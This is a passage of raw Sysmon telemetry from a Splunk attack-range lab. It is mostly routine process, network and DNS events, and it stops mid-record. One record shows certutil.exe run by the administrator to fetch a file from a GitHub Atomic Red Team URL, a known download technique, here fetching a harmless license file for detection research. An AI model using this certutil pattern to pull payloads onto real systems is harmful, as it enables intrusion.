21:49:46.512{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917533Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.512{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917532Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.512{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917531Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.512{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917530Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.512{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917529Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.511{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005917528Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.511{896A638B-B3FA-605B-7A69-00000000AE01}4760C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" –verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt C:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000005917527Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.496{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02C601EB9831A39E9D51676E81EB79A,SHA256=F68BE7679963D256D9D13FD9AA2B240EC8ABE41A285CA2961A63B610089FF31D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638462Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:41.459{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57252-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000005917526Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:46.319{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29FCBBDF0462FA85B3B6C62C15227189,SHA256=BE45CEF2976F962FBB5C379538DD0B62F310DC45263888D11F581595AD71F1A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917525Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:42.538{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local49588- 23542300x8000000000000000638464Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:47.507{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D80754CE03FECE57EE9DFF04FE52A436,SHA256=C7484551D4841284B8BE1E35EE48CFAA74ACF2AA7824919797A93B3577D642DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917571Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:47.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917570Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:47.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917569Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:47.662{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9B6270B4E9362119F51909E3C1E4968,SHA256=458341440AC04F7FC9D843C8182619E1761425722CCA957AF634CD426D6E6537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917568Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:47.661{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BBE06497BD219D6C3F7F843FADDCE14,SHA256=EA88E285B5568F946EEEBB7607DED79BB516CCA90CA21E319E6EF9E5F658CAB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917567Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:47.661{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FC940BA859465DFCB7CB48366010915B,SHA256=81F73F72B6BD7965F925197019776A2D15313244931D8E44ABE2A338D4A56F62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917566Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.987{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1502-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005917565Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:43.987{896A638B-B5DB-6058-2A00-00000000AE01}3044C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1502-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 10341000x80000000000000005917576Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:48.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917575Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:48.728{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000005917574Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:45.278{00000000-0000-0000-0000-000000000000}4760raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 23542300x80000000000000005917573Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:48.668{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0811D502633956D23FA6AAC81D51C10C,SHA256=D8341B0B4163C99968FF3C0F8B56B13548DB3DB3559E9ADAD4BBCD79AEA2E41B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638465Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:48.523{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CF99178AD81E276A962BD22102433E5,SHA256=C24C39464F49741E61769926B7CF99FF76C3F2ACE48838BE6E838793F11D5195,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005917572Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:45.275{00000000-0000-0000-0000-000000000000}4760<unknown process>-tcptruefalse10.0.1.14win-dc-792.attackrange.local1503-false185.199.111.133cdn-185-199-111-133.github.com443https 23542300x80000000000000005917587Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.794{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA66B8F9F72C092F5AFDDC27CA06A771,SHA256=58556FB049E341FF2F27766B88815E62113E82840B8764C84B65B7A2BF45B7F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638466Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:49.538{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2FB5F2F6ABF7A001DFFC332BBA2E55D,SHA256=676F99719BD41F20FA902F6C551055F110CD1C26F614612823EB444EFACB9787,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917586Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917585Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917584Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.362{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B3FD-605B-7C69-00000000AE01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917583Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.360{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917582Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.360{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917581Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.360{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917580Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.360{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917579Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.359{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B3FD-605B-7C69-00000000AE01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917578Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.359{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B3FD-605B-7C69-00000000AE01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917577Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:49.350{896A638B-B3FD-605B-7C69-00000000AE01}4212C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005917608Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.986{896A638B-B3FE-605B-7E69-00000000AE01}5056184C:\Program 